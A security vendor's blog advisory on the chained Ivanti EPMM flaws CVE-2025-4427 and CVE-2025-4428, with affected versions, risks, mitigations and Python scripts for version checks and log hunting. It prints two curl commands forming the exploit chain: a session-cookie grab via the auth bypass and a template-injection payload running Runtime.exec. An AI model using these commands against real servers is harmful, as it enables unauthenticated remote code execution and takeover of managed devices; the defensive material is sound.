
Exploited! Ivanti EPMM Authentication Bypass & Remote Code Execution (CVE-2025-4427 & CVE-2025-4428)

Amit Sheps, Director of Product Marketing
May 18, 2025

Ivanti’s Endpoint Manager Mobile (EPMM, formerly MobileIron Core) just delivered an unpleasant one-two punch to defenders. Two fresh vulnerabilities—an authentication bypass (CVE-2025-4427) and an API-level remote-code-execution flaw (CVE-2025-4428)—can be chained to grant unauthenticated attackers full command execution on affected servers. Both issues are already being exploited in the wild, making rapid remediation essential.

What Are the CVE-2025-4427 & CVE-2025-4428 Ivanti EPMM Vulnerabilities?

CVE-2025-4427 – API Authentication Bypass
A logic flaw in the /mifs REST API incorrectly validates session tokens, letting remote, unauthenticated users reach endpoints that should be gated behind login. CVSS 3.1 base: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

CVE-2025-4428 – Authenticated Remote Code Execution
Once on an API endpoint, attackers can pass malicious server-side template expressions that Hibernate Validator processes inside a Spring bean. Unsafe evaluation leads to arbitrary command execution as the tomcat user. CVSS 3.1 base: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).

Affected versions (best public data) – anything ≤ 12.5.0.0 as well as the 11.x and 12.3/12.4 maintenance branches:

  • 11.12.0.4 and older
  • 12.3.0.1 and older
  • 12.4.0.1 and older
  • 12.5.0.0 and older

Fixed builds: 11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1.
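A quick way to turn the version table above into a repeatable check for an inventory of EPMM hosts. This is an added example, not Ivanti's or the post's own code: the fixed builds and the "anything up to 12.5.0.0" rule are taken from the advisory summary above, while the parsing and branch logic (judging a branch with no listed fix against the 12.5.0.0 upper bound) are this example's own assumptions.

```python
"""Decide whether an Ivanti EPMM build string is in the affected range.

Added example (not Ivanti's or the post's own code).  The fixed builds and
the "anything <= 12.5.0.0" rule come from the advisory summary above; the
parsing and branch handling are this example's own assumptions.
"""

# Fixed build for each maintenance branch named in the post.
FIXED_BUILDS = {
    (11, 12): (11, 12, 0, 5),
    (12, 3): (12, 3, 0, 2),
    (12, 4): (12, 4, 0, 2),
    (12, 5): (12, 5, 0, 1),
}

# Newest build the post describes as affected; branches without a listed
# fix (for example an old 12.2.x install) are judged against this bound.
LATEST_AFFECTED = (12, 5, 0, 0)


def parse_version(text: str) -> tuple:
    """Turn '12.5.0.1' (or a shorter '12.5') into a 4-tuple of ints."""
    parts = text.strip().split(".")
    if not all(p.isdigit() for p in parts) or len(parts) > 4:
        raise ValueError(f"not a dotted numeric EPMM version: {text!r}")
    nums = tuple(int(p) for p in parts)
    return nums + (0,) * (4 - len(nums))


def fmt(v: tuple) -> str:
    return ".".join(str(n) for n in v)


def assess(version_text: str) -> dict:
    """Classify one EPMM build against the published fixed builds."""
    v = parse_version(version_text)
    fixed = FIXED_BUILDS.get(v[:2])
    if fixed is not None:
        # Known branch: vulnerable iff older than that branch's fixed build.
        vulnerable = v < fixed
        return {
            "version": fmt(v),
            "vulnerable": vulnerable,
            "upgrade_to": fmt(fixed) if vulnerable else None,
        }
    # No fixed build listed for this branch: the post treats everything up
    # to 12.5.0.0 as affected, so point at the newest fixed build.
    vulnerable = v <= LATEST_AFFECTED
    return {
        "version": fmt(v),
        "vulnerable": vulnerable,
        "upgrade_to": fmt(FIXED_BUILDS[(12, 5)]) if vulnerable else None,
    }


if __name__ == "__main__":
    for build in ("11.12.0.4", "11.12.0.5", "12.2.0.0", "12.5.0.0", "12.5.0.1"):
        print(build, "->", assess(build))
```

Feed it the build strings from your asset inventory; anything that comes back `vulnerable: True` should be scheduled for the listed upgrade or, failing that, the workarounds in the mitigation section.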

Exploiting the Vulnerability Chain

Because CVE-2025-4428 requires an authenticated session, threat actors first abuse CVE-2025-4427 to grab an unlocked API cookie. The most reliable path so far targets /mifs/admin/ endpoints:

```bash
# 1. Steal a session cookie via auth-bypass
curl -isk "https://<target>/mifs/admin/heartbeatCheck" \
     -H "Accept: application/json" \
     | grep 'Set-Cookie: ZSESSIONID' | cut -d';' -f1
```

With that cookie, attackers send a malicious payload using watchTowr's disclosed endpoint:

```bash
# 2. Trigger SSTI to achieve RCE
curl -isk "https://<target>/mifs/admin/rest/api/v2/featureusage" \
     -H "Cookie: ZSESSIONID=<stolen>" \
     -H "Content-Type: application/json" \
     -d '{"expr":"${T(java.lang.Runtime).getRuntime().exec(\"id\") }"}'
```

If successful, the response body leaks the command output—proof that the server executed arbitrary OS commands.

Why this chain matters: CVE-2025-4427 on its own “only” reveals limited configuration details. But once combined with CVE-2025-4428, the attacker instantly upgrades to pre-auth RCE, bypassing every control EPMM’s UI appears to enforce.

Potential Risks

  • Data exposure – EPMM holds device inventory, security posture, and MDM certificates that can unlock corporate mobile fleets.
  • Lateral pivot – Running arbitrary commands on the host lets attackers scrape credentials, drop web-shells, or tunnel deeper into the network.
  • Mobile device takeover – With administrator-level EPMM access, threat actors can push malicious configs/apps to every enrolled phone.
  • Compliance breach – Abuse of MDM infrastructure jeopardises GDPR, PCI-DSS, and ISO 27001 controls for secure mobile management.
  • Ransomware precursor – RMM/MDM servers are prime footholds for staging mass-scale encryption of endpoints.

Mitigation Steps

  1. Patch Immediately
    • Apply Ivanti’s fixed builds (11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1) from the official advisory.
  2. Temporary Work-arounds (if upgrade is delayed)
    • Restrict /mifs and /mifs/admin paths at the load-balancer or WAF to internal IP ranges only.
    • Enable two-factor admin login; CVE-2025-4427 cannot circumvent MFA on the interactive UI, and the bypass is avoided entirely by blocking unauthenticated API calls.
  3. Harden Server-Side Expression Handling
    • If custom validation logic exists, set hibernate.validator.expressionLanguage to none in application.properties to disable EL evaluation.
  4. Threat Hunt & Forensics
    • Search web-server logs for requests to /featureusage or unusual heartbeatCheck, licenseCheck, and getState API calls.
    • Scan for new .jsp, .war, or .class files in ${EPMM_HOME}/tomcat/webapps/.
  5. Continuous Validation with IONIX
    • Use the IONIX Exposure Management Platform to validate exploitability across Internet-facing hosts and prioritise RCE chains that truly work in your environment.
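The hunt items in step 4 are easy to script. The following is an added example, not Ivanti's or IONIX's code: it assumes combined-format web-server access logs (Apache/Tomcat style), takes the endpoint names and file extensions from the step above, and uses constructed sample log lines and an assumed set of internal address ranges. It flags every request that reaches /featureusage, counts calls to the heartbeatCheck, licenseCheck and getState endpoints by source (splitting internal from external clients, which ties in with the path-restriction workaround in step 2), and offers a walker for recently written .jsp, .war and .class files under the Tomcat webapps directory.

```python
"""Hunt for the EPMM indicators listed in the mitigation steps above.

Added example, not Ivanti's or IONIX's code.  It assumes combined-format
web-server access logs (Apache/Tomcat style) and takes the endpoint names
and file extensions from the post; the sample log lines and the internal
address ranges are constructed for the example.
"""
import ipaddress
import os
import re
import time
from collections import Counter

# Indicators from the hunt guidance: the RCE sink and the auth-bypass probes.
RCE_PATH = re.compile(r"/featureusage\b")
PROBE_PATH = re.compile(r"/(heartbeatCheck|licenseCheck|getState)\b")
WEBSHELL_SUFFIXES = (".jsp", ".war", ".class")

# Assumed internal ranges; replace with the ranges your EPMM admins use.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Combined log format: client ident user [time] "METHOD PATH PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one internal probe, one external probe followed by a
# featureusage POST from the same client, one benign login, one junk line.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/May/2025:10:00:00 +0000] "GET /mifs/admin/heartbeatCheck HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.7 - - [18/May/2025:10:01:00 +0000] "GET /mifs/admin/heartbeatCheck HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.7 - - [18/May/2025:10:01:05 +0000] "POST /mifs/admin/rest/api/v2/featureusage HTTP/1.1" 200 1024 "-" "python-requests/2.31"',
    '10.0.0.8 - - [18/May/2025:10:02:00 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    'this line is not an access-log record',
]


def is_internal(ip_text: str) -> bool:
    """True if the client address falls inside an assumed internal range."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False  # hostnames or garbage are treated as external
    return any(ip in net for net in INTERNAL_NETS)


def hunt_log(lines):
    """Return featureusage hits plus probe-call counts split by origin."""
    result = {"rce_hits": [], "external_probes": Counter(), "internal_probes": Counter()}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log record; skip rather than guess
        rec = m.groupdict()
        if RCE_PATH.search(rec["path"]):
            # Any request reaching featureusage deserves a look; one from
            # outside the internal ranges is the worst case.
            rec["severity"] = "review" if is_internal(rec["ip"]) else "high"
            result["rce_hits"].append(rec)
        elif PROBE_PATH.search(rec["path"]):
            bucket = "internal_probes" if is_internal(rec["ip"]) else "external_probes"
            result[bucket][rec["ip"]] += 1
    return result


def is_suspicious_artifact(path: str, mtime: float, now: float, max_age_hours: float) -> bool:
    """A .jsp/.war/.class file written within the look-back window."""
    return path.endswith(WEBSHELL_SUFFIXES) and mtime >= now - max_age_hours * 3600


def find_recent_webapp_files(webapps_dir: str, max_age_hours: float = 24.0):
    """Walk ${EPMM_HOME}/tomcat/webapps/ and list recently written artifacts."""
    now = time.time()
    hits = []
    for root, _dirs, files in os.walk(webapps_dir):
        for name in files:
            full = os.path.join(root, name)
            if is_suspicious_artifact(full, os.path.getmtime(full), now, max_age_hours):
                hits.append(full)
    return hits


if __name__ == "__main__":
    for key, value in hunt_log(SAMPLE_LOG).items():
        print(key, value)
```

Point `hunt_log` at the real access log (one line per list element) and `find_recent_webapp_files` at the webapps directory on the appliance. An external client that probes heartbeatCheck and then reaches /featureusage within seconds, as in the constructed sample, is the pattern the chain described earlier would leave behind; a "review" hit from an internal address still warrants confirming that a known admin tool made the call.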

Am I Impacted by CVE-2025-4427 and CVE-2025-4428?

IONIX is actively tracking these vulnerabilities. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.

References

  • NVD entries for CVE-2025-4427 & CVE-2025-4428
  • Tenable Research advisory
  • watchTowr Labs deep dive & PoC
  • Rapid7 exploit-in-the-wild analysis
  • The Hacker News coverage of patch & PoC
